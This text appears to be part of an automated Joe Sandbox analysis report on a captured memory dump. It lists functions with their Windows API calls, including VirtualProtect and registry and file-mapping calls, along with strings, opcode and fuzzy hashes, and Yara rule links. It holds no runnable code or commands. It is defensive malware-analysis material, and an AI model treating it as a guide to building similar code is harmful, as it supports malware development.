Opcode Fuzzy Hash: 7a6deac52f06f393d3d29d97d230ff9207667ff6839141349697b3e43bbd1238
Instruction Fuzzy Hash: 4A216D31209121AFD615DF65EC88C6AFB7AFF49B123544410F809C3660C779ECAACBE4

Uniqueness

Uniqueness Score: -1.00%

Function 00755D2E Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 217COMMON

Download Yara Rule

APIs

Part of subcall function 0076D406: GetLastError.KERNEL32(?,00755D5F,?,?), ref: 0076D426
Part of subcall function 0076D406: Sleep.KERNEL32(00000064,?,00755D5F,?,?), ref: 0076D438

GetLastError.KERNEL32 ref: 00755FB9

Part of subcall function 00763F46: InterlockedExchange.KERNEL32(?,000000FF), ref: 00763F4D

Strings

*&w, xrefs: 00755EFF
&w, xrefs: 00755EE4
%w, xrefs: 00755F59

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$ExchangeInterlockedSleep
String ID: &w$*&w$%w
API String ID: 1673871733-1125911077
Opcode ID: 47fe4e84b8a7aa21cca67f198574d8346bc21a69d13735ec55a71d5afb2ef7c4
Instruction ID: b3d3b7b316cd7ab460b9c84db7426ed2cc25c3f2b59793cbb15a5b1a3a255716
Opcode Fuzzy Hash: 47fe4e84b8a7aa21cca67f198574d8346bc21a69d13735ec55a71d5afb2ef7c4
Instruction Fuzzy Hash: 2981D531904A48AFDF228BA4C855BEEBBF5AF48311F140094E995971C1DBB8DE9ACF10

Uniqueness

Uniqueness Score: -1.00%

Function 00764B3A Relevance: 6.2, APIs: 4, Instructions: 192COMMON

Download Yara Rule

APIs

Part of subcall function 00752C75: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,?), ref: 00752C90
Part of subcall function 00752C75: LoadLibraryA.KERNEL32(00000000), ref: 00752CDE
Part of subcall function 00752C75: GetProcAddress.KERNEL32(00000000,?), ref: 00752CF7
Part of subcall function 00752C75: RegCloseKey.ADVAPI32(?), ref: 00752D48

GetLastError.KERNEL32 ref: 00764CC8
FreeLibrary.KERNEL32(?), ref: 00764D30

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
String ID:
API String ID: 1730969706-0
Opcode ID: dd51d5ca8808ad334200c85c32d41917093cf1d2ddb8f24bb0061c203496f094
Instruction ID: cee52ac9acbad4ca98277e513bf67d3a6b7b1f4b602d89ab87df490ddc989ffe
Opcode Fuzzy Hash: dd51d5ca8808ad334200c85c32d41917093cf1d2ddb8f24bb0061c203496f094
Instruction Fuzzy Hash: 7F7106B5E00209EFCF10DFE4C8889AEBBB9FF49305B108569E916A7251D739AD41DF60

Uniqueness

Uniqueness Score: -1.00%

Function 0075A26A Relevance: 6.2, APIs: 4, Instructions: 155threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00764721: lstrlen.KERNEL32(npw,03F0C314,0077706E,00000000,0076EF9E), ref: 0076472A
Part of subcall function 00764721: memcpy.NTDLL(00000000,?,00000000,00000001), ref: 0076474D
Part of subcall function 00764721: memset.NTDLL ref: 0076475C

Part of subcall function 00756018: StrChrA.SHLWAPI(00000000,?,?,?,?,?,00754B4B,?,0000002C,?), ref: 0075603D
Part of subcall function 00756018: StrTrimA.SHLWAPI(00000000,00773FCC,00000000,?,?,?,00754B4B,?,0000002C,?), ref: 0075605C
Part of subcall function 00756018: StrChrA.SHLWAPI(00000000,?,?,?,?,00754B4B,?,0000002C,?), ref: 00756068

GetCurrentThreadId.KERNEL32 ref: 0075A302
GetCurrentThread.KERNEL32 ref: 0075A315
GetModuleHandleA.KERNEL32(00000000,007733F4,00000000,00000000,?,00000000,?,00000000,?), ref: 0075A39B
GetShellWindow.USER32 ref: 0075A3A2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: CurrentThread$HandleModuleShellTrimWindowlstrlenmemcpymemset
String ID:
API String ID: 1517849391-0
Opcode ID: 11a4e29d6e89c9969255b36e9888679613ee870024b10966138f6ae580442bc8
Instruction ID: 7752dfc2a533f290f0e36e48ae0694bd97ba96edadb0ef1a4bdab26fa377d1d0
Opcode Fuzzy Hash: 11a4e29d6e89c9969255b36e9888679613ee870024b10966138f6ae580442bc8
Instruction Fuzzy Hash: 93519172508305FFD710EF64C889A9AB7E8BB44385F104939F94597151D7B8ED48CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00771B5C Relevance: 6.1, APIs: 4, Instructions: 140stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000000,00000030,?,?,?,00759F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 00771B68

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

ResetEvent.KERNEL32(?,?,?,?,00759F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 00771BDF
GetLastError.KERNEL32(?,?,?,00759F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 00771C0C

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

GetLastError.KERNEL32(?,?,?,00759F89,?,00000000,00000001,00000000,00000000,00000008,00000030), ref: 00771CCE

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorHeapLast$AllocateEventFreeResetlstrlen
String ID:
API String ID: 943265810-0
Opcode ID: 74e4fa602c8197a2571c60c2849119f1090c31bd9d22a4877559e9975a24dcd7
Instruction ID: c7eef87fa2b6afc3b3e1d458d66b9e69fabff49ccfe57dbafaceb7e387989de8
Opcode Fuzzy Hash: 74e4fa602c8197a2571c60c2849119f1090c31bd9d22a4877559e9975a24dcd7
Instruction Fuzzy Hash: 574183B1640308BFDB219FA4CD89E7B7BADEB05784B508929F50AD11A0D778DD44DB20

Uniqueness

Uniqueness Score: -1.00%

Function 0076678D Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_allmul.NTDLL(?,00000000,00000000,00000001), ref: 00766840
_aulldiv.NTDLL(00000000,?,00000100,00000000), ref: 00766856
memset.NTDLL ref: 007668FF
memset.NTDLL ref: 00766915

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memset$_allmul_aulldiv
String ID:
API String ID: 3041852380-0
Opcode ID: 26df312c11c536f0dd63f966a94f113ddaf7e63113e8305cfe55c46eb993c323
Instruction ID: 56484a07f366b578d1fc29365559e1ec82242e02a16bbfc7f7ff6c873454ae53
Opcode Fuzzy Hash: 26df312c11c536f0dd63f966a94f113ddaf7e63113e8305cfe55c46eb993c323
Instruction Fuzzy Hash: 9F41F372A00219EFDB109F68CC85BEE7775EF45310F404569FC1AA7281EB78AE59CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00759D00 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 127memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,?,?,00000000,00778440,00000000,?), ref: 00759D34
HeapFree.KERNEL32(00000000,?,00000007,?,00000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00759E2C
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 00759E65

Strings

u, xrefs: 00759DF4, 00759E08

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: u
API String ID: 3298025750-1515575680
Opcode ID: 93484c02ea1554eb6d5cb0b0251fba1141562679e557f8747c95d183d7ab810c
Instruction ID: 3eeccbdba921a29e22cffd0dcb2ab5b28e431e734fad075f1884c62c3a920140
Opcode Fuzzy Hash: 93484c02ea1554eb6d5cb0b0251fba1141562679e557f8747c95d183d7ab810c
Instruction Fuzzy Hash: 49414E71E0020EEFDF20DFA4D885AEDB7B5EB05746F148429EE04E2210D3B99E89CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0075AAD5 Relevance: 6.1, APIs: 4, Instructions: 119stringCOMMON

Download Yara Rule

APIs

StrRChrA.SHLWAPI(?,00000000,00000023), ref: 0075AAEF
StrChrA.SHLWAPI(?,0000005C), ref: 0075AB16
lstrcpyn.KERNEL32(?,?,00000001,00000001), ref: 0075AB3C
lstrcpy.KERNEL32(?,?), ref: 0075ABE0

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: lstrcpylstrcpyn
String ID:
API String ID: 4154805583-0
Opcode ID: 72339ccd818d71d4e97eb2c6ae78738d6e03b16b49c52eed2cd142347fd4dc64
Instruction ID: 8924a6fa771a296a7273296fecea3ce1bbdb08ae9e37566c6a3ce302ef566ef8
Opcode Fuzzy Hash: 72339ccd818d71d4e97eb2c6ae78738d6e03b16b49c52eed2cd142347fd4dc64
Instruction Fuzzy Hash: 73418FB6900219FFDB129BA4CC48DEE7BBDAF08351F0485B6E905E7150D7789E48CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00751F46 Relevance: 6.1, APIs: 4, Instructions: 113COMMON

Download Yara Rule

APIs

_strupr.NTDLL ref: 00751F8D
_strupr.NTDLL ref: 00751FE2
_strupr.NTDLL ref: 00752021
_strupr.NTDLL ref: 0075205B

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: _strupr
String ID:
API String ID: 3408778250-0
Opcode ID: bccc4c0f3a80aba29c28929892b5f4d46547c3f389d605cad7025585b965ea40
Instruction ID: e5e06fdfb295a84f44aa5bb277c7ecd65d68c05e1176e99f778c5959d0e345c8
Opcode Fuzzy Hash: bccc4c0f3a80aba29c28929892b5f4d46547c3f389d605cad7025585b965ea40
Instruction Fuzzy Hash: 12416331905209DEDF24DF68D889AEEB7A9FF44381F544521FC18D60A1E7BCD859CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00761230 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

ResetEvent.KERNEL32(?), ref: 00761246
GetLastError.KERNEL32 ref: 0076125F

Part of subcall function 0076216A: WaitForMultipleObjects.KERNEL32(00000002,00000008,00000000,00000008,?,?,?,00771C2A,0000EA60,?,?,?,00759F89,?,00000000,00000001), ref: 00762185

ResetEvent.KERNEL32(?), ref: 007612D8
GetLastError.KERNEL32 ref: 007612F3

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorEventLastReset$MultipleObjectsWait
String ID:
API String ID: 2394032930-0
Opcode ID: 07592a83d77dab3eaf45aa8c5275225e1695f6e9e1228098bc5915a595f971c5
Instruction ID: 516d5704ad06fc36815d71559c8cc7e4b6fbb562f2e9cfc7d34df8378c83f2e3
Opcode Fuzzy Hash: 07592a83d77dab3eaf45aa8c5275225e1695f6e9e1228098bc5915a595f971c5
Instruction Fuzzy Hash: D231C432600604EFCB219FA6CC48A6E77B9FF84750F584564E917E76A0E774ED41DB10

Uniqueness

Uniqueness Score: -1.00%

Function 0076BD42 Relevance: 6.1, APIs: 4, Instructions: 105memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 007597AB: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000), ref: 007597B9

RtlAllocateHeap.NTDLL(00000000,?), ref: 0076BDAA
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0076BDFB

Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,?,00000000,?,00000080,00000000), ref: 007556D7
Part of subcall function 00755697: GetLastError.KERNEL32(?,00000080,00000000), ref: 007556E1
Part of subcall function 00755697: WaitForSingleObject.KERNEL32(000000C8,?,00000080,00000000), ref: 00755706
Part of subcall function 00755697: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,00000080,00000000), ref: 00755729
Part of subcall function 00755697: SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,00000080,00000000), ref: 00755751
Part of subcall function 00755697: WriteFile.KERNEL32(?,00001388,?,?,00000000,?,00000080,00000000), ref: 00755766
Part of subcall function 00755697: SetEndOfFile.KERNEL32(?,?,00000080,00000000), ref: 00755773
Part of subcall function 00755697: CloseHandle.KERNEL32(?,?,00000080,00000000), ref: 0075578B

HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000101,?,?,?,00767621,?,?,?,?,?,?), ref: 0076BE30
HeapFree.KERNEL32(00000000,?,?,?,?,00767621,?,?,?,?,?,?,00000000,?,00000000), ref: 0076BE40

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$Heap$AllocateCreateFreeTime$CloseErrorHandleLastObjectPointerSingleSystemWaitWrite
String ID:
API String ID: 4200334623-0
Opcode ID: 91288bec9beddb678879856696c88fab916938bcb44db71e078f0941eed9c666
Instruction ID: 8fd4cda0b1521c51f6b7e994cc252ca51351d8f3333885b2da1a540b07cfdd80
Opcode Fuzzy Hash: 91288bec9beddb678879856696c88fab916938bcb44db71e078f0941eed9c666
Instruction Fuzzy Hash: CE31F776510019FFEB109FA4DC89CAEBB7DFB09780B104066FA09D3120DB75AE95DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00765978 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 96COMMON

Download Yara Rule

APIs

Part of subcall function 0076D406: GetLastError.KERNEL32(?,00755D5F,?,?), ref: 0076D426
Part of subcall function 0076D406: Sleep.KERNEL32(00000064,?,00755D5F,?,?), ref: 0076D438

GetLastError.KERNEL32 ref: 00765A59

Part of subcall function 00763F46: InterlockedExchange.KERNEL32(?,000000FF), ref: 00763F4D

Strings

*&w, xrefs: 00765A1D
&w, xrefs: 007659F1
Z, xrefs: 00765A65

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLast$ExchangeInterlockedSleep
String ID: &w$*&w$Z
API String ID: 1673871733-3419649159
Opcode ID: 4604a2a3fed50bd4b16e03f40edee1668e2334fa521c9306ce8d4c7eb171fd01
Instruction ID: 3202ce9b5b0f32de771e37672448d9839a2356aece50b986b1738b231183c052
Opcode Fuzzy Hash: 4604a2a3fed50bd4b16e03f40edee1668e2334fa521c9306ce8d4c7eb171fd01
Instruction Fuzzy Hash: F6313831A08B48BEEF109BF4CC85BBEBF75AF48704F048569E646E7190E6B85D49D701

Uniqueness

Uniqueness Score: -1.00%

Function 0076FA00 Relevance: 6.1, APIs: 4, Instructions: 92synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,00000000,?,00000000), ref: 0076FA17
SetEvent.KERNEL32(?), ref: 0076FA27
GetLastError.KERNEL32 ref: 0076FAB0

Part of subcall function 0076216A: WaitForMultipleObjects.KERNEL32(00000002,00000008,00000000,00000008,?,?,?,00771C2A,0000EA60,?,?,?,00759F89,?,00000000,00000001), ref: 00762185

Part of subcall function 0077020F: HeapFree.KERNEL32(00000000,0076C525,00752B34,00000000,?,775EC740,0076C525), ref: 0077021B

GetLastError.KERNEL32(00000000), ref: 0076FAE5

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ErrorLastWait$EventFreeHeapMultipleObjectObjectsSingle
String ID:
API String ID: 602384898-0
Opcode ID: 6048edc07771626e6b8fda38e69c6d8c448c32ad3c02ef9494248903236e12b9
Instruction ID: 28720738c166aff1c714ea9fb975e93ac0b773272c0dc679ae0582649a726eb0
Opcode Fuzzy Hash: 6048edc07771626e6b8fda38e69c6d8c448c32ad3c02ef9494248903236e12b9
Instruction Fuzzy Hash: AB314EB5900309EFDB20DFE4DC8499EB7B8FB09344F20897AE907A6251D778AA45DF10

Uniqueness

Uniqueness Score: -1.00%

Function 00764EFE Relevance: 6.1, APIs: 4, Instructions: 83COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?), ref: 00764F2D
SetEvent.KERNEL32(?), ref: 00764F77
TlsSetValue.KERNEL32(00000001), ref: 00764FB1
TlsSetValue.KERNEL32(00000000), ref: 00764FCD

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Value$Event
String ID:
API String ID: 3803239005-0
Opcode ID: 950bc5431c27a9a0d1562346ddfabb23e62a57ce019030e2a77596bc73530d2c
Instruction ID: 021a5aa1e0fabc1700be7cac36057b34430bf26dd68cb1c96a19bd8724da815e
Opcode Fuzzy Hash: 950bc5431c27a9a0d1562346ddfabb23e62a57ce019030e2a77596bc73530d2c
Instruction Fuzzy Hash: 9821B271200208EFCF618F59ED899AA7BA2FF41391B584829F807CA570C739EC91DB51

Uniqueness

Uniqueness Score: -1.00%

Function 0076DF1B Relevance: 6.1, APIs: 4, Instructions: 82memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00754EC7: memcpy.NTDLL(00000000,00000110,?,?,00000000,?,?,?,00000000), ref: 00754EFD
Part of subcall function 00754EC7: memset.NTDLL ref: 00754F73
Part of subcall function 00754EC7: memset.NTDLL ref: 00754F87

RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 0076DF73
lstrcmpi.KERNEL32(00000000,?), ref: 0076DF9A
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0076DFDF
HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0076DFF0

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: Heap$Freememset$Allocatelstrcmpimemcpy
String ID:
API String ID: 1065503980-0
Opcode ID: afbc9eae2e79727fe92c97730f5e22b4ea0a830f68d217b2cf787f221e1b5957
Instruction ID: 333f431e9f018774c601f62d4e31bacda60ffc6a57141d03d0817061d9c196c7
Opcode Fuzzy Hash: afbc9eae2e79727fe92c97730f5e22b4ea0a830f68d217b2cf787f221e1b5957
Instruction Fuzzy Hash: 06217131A00109FFDF109FA4DC49EED7B79FB04355F108021F91A96160D7789E59DB55

Uniqueness

Uniqueness Score: -1.00%

Function 00761884 Relevance: 6.1, APIs: 4, Instructions: 75stringCOMMON

Download Yara Rule

APIs

memset.NTDLL ref: 007618A6
lstrlenW.KERNEL32(?,?,?,?,?,00000000), ref: 007618EA
OpenFileMappingA.KERNEL32(80000000,00000000,?), ref: 0076192D
CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 00761950

Part of subcall function 0075F425: GetTickCount.KERNEL32 ref: 0075F435
Part of subcall function 0075F425: CreateFileW.KERNEL32(0076A5EC,80000000,00000003,00778208,00000003,00000000,00000000,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F452
Part of subcall function 0075F425: GetFileSize.KERNEL32(0076A5EC,00000000,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F485
Part of subcall function 0075F425: CreateFileMappingA.KERNEL32(0076A5EC,00778208,00000002,00000000,00000000,0076A5EC), ref: 0075F499
Part of subcall function 0075F425: lstrlen.KERNEL32(0076A5EC,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F4B5
Part of subcall function 0075F425: lstrcpy.KERNEL32(?,0076A5EC), ref: 0075F4C5
Part of subcall function 0075F425: HeapFree.KERNEL32(00000000,0076A5EC,?,0076A5EC,00000000,?,0075C1CF,00000000), ref: 0075F4E0
Part of subcall function 0075F425: CloseHandle.KERNEL32(0076A5EC,?,0076A5EC), ref: 0075F4F2

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleMappinglstrlen$CountFreeHeapOpenSizeTicklstrcpymemset
String ID:
API String ID: 3239194699-0
Opcode ID: 3ecef32f513b8dfe13ed42cdf6a81cc28d062ea5a2946e17b92b3c1380b204cb
Instruction ID: 22f09521a7899921d5a6854a6b982bea90e29e5aedb7aa7b50038dad9a9fff85
Opcode Fuzzy Hash: 3ecef32f513b8dfe13ed42cdf6a81cc28d062ea5a2946e17b92b3c1380b204cb
Instruction Fuzzy Hash: 37217A3190034DEADF20DF65DC18EEE7BB9AF45360F540125FC1AA2160D7389949CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0075EAF9 Relevance: 6.1, APIs: 4, Instructions: 70fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0076D0F7: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,0075EB10), ref: 0076D11D

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,?,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0075EB4B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,00752A85,?), ref: 0075EB5D
ReadFile.KERNEL32(?,?,00000004,?,00000000,?,?,?,?,?,00752A85,?), ref: 0075EB75
CloseHandle.KERNEL32(?,?,?,?,?,?,00752A85,?), ref: 0075EB90

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleModuleNamePointerRead
String ID:
API String ID: 1352878660-0
Opcode ID: 8a5ceed66dbce0b94be45e926e396359c919ef08e4953c0087521ad7f7890193
Instruction ID: e13011f8f0f73cdf93018c51a74a47d6cc61c60d193cae85746da6e7870697a4
Opcode Fuzzy Hash: 8a5ceed66dbce0b94be45e926e396359c919ef08e4953c0087521ad7f7890193
Instruction Fuzzy Hash: CD1181B1A00228FBEB206FA5CC89EEF7E6DEF01792F104015F909E5150D3788F44D690

Uniqueness

Uniqueness Score: -1.00%

Function 0076586B Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,?,00755124,?), ref: 007658A3

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

lstrcpy.KERNEL32(00000000,?), ref: 007658BA
StrChrA.SHLWAPI(00000000,0000002E), ref: 007658C3
GetModuleHandleA.KERNEL32(00000000), ref: 007658E1

Part of subcall function 00766924: VirtualProtect.KERNEL32(00000000,00000005,00000040,00000040,00000000,00000005,00000400,?,?,?,00000001,00000000,00000004, Uqt,?,80000000), ref: 007669FC
Part of subcall function 00766924: VirtualProtect.KERNEL32(00000006,00000004, Uqt, Uqt,?,00000001,00000000,00000004, Uqt,?,80000000,00000000,?,007740B0,0000001C,00760691), ref: 00766A17
Part of subcall function 00766924: RtlEnterCriticalSection.NTDLL(00778420), ref: 00766A3C

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: ProtectVirtual$AllocateCriticalEnterHandleHeapModuleSectionlstrcpylstrlen
String ID:
API String ID: 105881616-0
Opcode ID: 6b2fb5e42c15fff6fe18b06a2bc678811a1303fbf0edc4a64e82b5fd660cb96a
Instruction ID: 49d604183b9185d21397ebd17aa11197bf4182f136b870ac9b6431cf8e905711
Opcode Fuzzy Hash: 6b2fb5e42c15fff6fe18b06a2bc678811a1303fbf0edc4a64e82b5fd660cb96a
Instruction Fuzzy Hash: 24216D74A00709EFCB25DF64C848BAEBBF9FF44350F108059E85A97261DB78EA41EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00760443 Relevance: 6.1, APIs: 4, Instructions: 68stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000,74758250,747169A0,?,?,?,0075164B,?,00000000,?), ref: 00760453

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0075164B,?,00000000,?), ref: 00760475
lstrcpyW.KERNEL32(00000000,?), ref: 007604A1
lstrcatW.KERNEL32(00000000,?), ref: 007604B4

Part of subcall function 007580B9: strstr.NTDLL ref: 00758191
Part of subcall function 007580B9: strstr.NTDLL ref: 007581E4

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: strstr$AllocateByteCharHeapMultiWidelstrcatlstrcpylstrlen
String ID:
API String ID: 3712611166-0
Opcode ID: a74ca30607efd061a914fdb6dbddfa862198e432efc4c2908a49b01127bc15b4
Instruction ID: 439b6d134e80ceaf6a78f29683f200a61193cfb2010d42d1920afc2ebf33246f
Opcode Fuzzy Hash: a74ca30607efd061a914fdb6dbddfa862198e432efc4c2908a49b01127bc15b4
Instruction Fuzzy Hash: B0111772500119FFDB11AFA4DC88CEF7FA9EF09391B008025FA09A6121DB39DE41DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00769B49 Relevance: 6.1, APIs: 4, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,00000008,00000008), ref: 00769B64
RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,00000008,?,00000008), ref: 00769B88
RegCloseKey.ADVAPI32(00000008,?,00000008), ref: 00769BE0

Part of subcall function 0075E83D: RtlAllocateHeap.NTDLL(00000000,?,00764741), ref: 0075E849

RegQueryValueExA.ADVAPI32(00000008,?,00000000,?,00000000,?,?,00000000,?,00000008), ref: 00769BB1

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: QueryValue$AllocateCloseHeapOpen
String ID:
API String ID: 453107315-0
Opcode ID: 406c1adc2260b6481e9e39865bb956b1cd75186255a0862ce796c0d357bd4d21
Instruction ID: c6250d0fdd8073e408dbf3d500c0a695e0a8ca2cd69851c8c670650afcfcbee1
Opcode Fuzzy Hash: 406c1adc2260b6481e9e39865bb956b1cd75186255a0862ce796c0d357bd4d21
Instruction Fuzzy Hash: 1E2186B590020CFFDF119F94DC84CEE7BBDEB88350F208466F90AA6111D7759A95DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00768B2F Relevance: 6.1, APIs: 4, Instructions: 61memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00765794,00000000,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00768B3A
RtlAllocateHeap.NTDLL(00000000,?), ref: 00768B52
memcpy.NTDLL(00000000,?,-00000008,?,?,?,00765794,00000000,?,77D3EB70,0076C5F4,00000000,03F0C310), ref: 00768B96
memcpy.NTDLL(00000001,?,00000001), ref: 00768BB7

Memory Dump Source

Source File: 00000000.00000002.497478535.0000000000750000.00000040.10000000.00040000.00000000.sdmp, Offset: 00750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_750000_Lx6.jbxd

Yara matches

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: 40d40e0102323ef980ae5396bf4b63129aa457913df64c6d5b8ed3360802e8f1
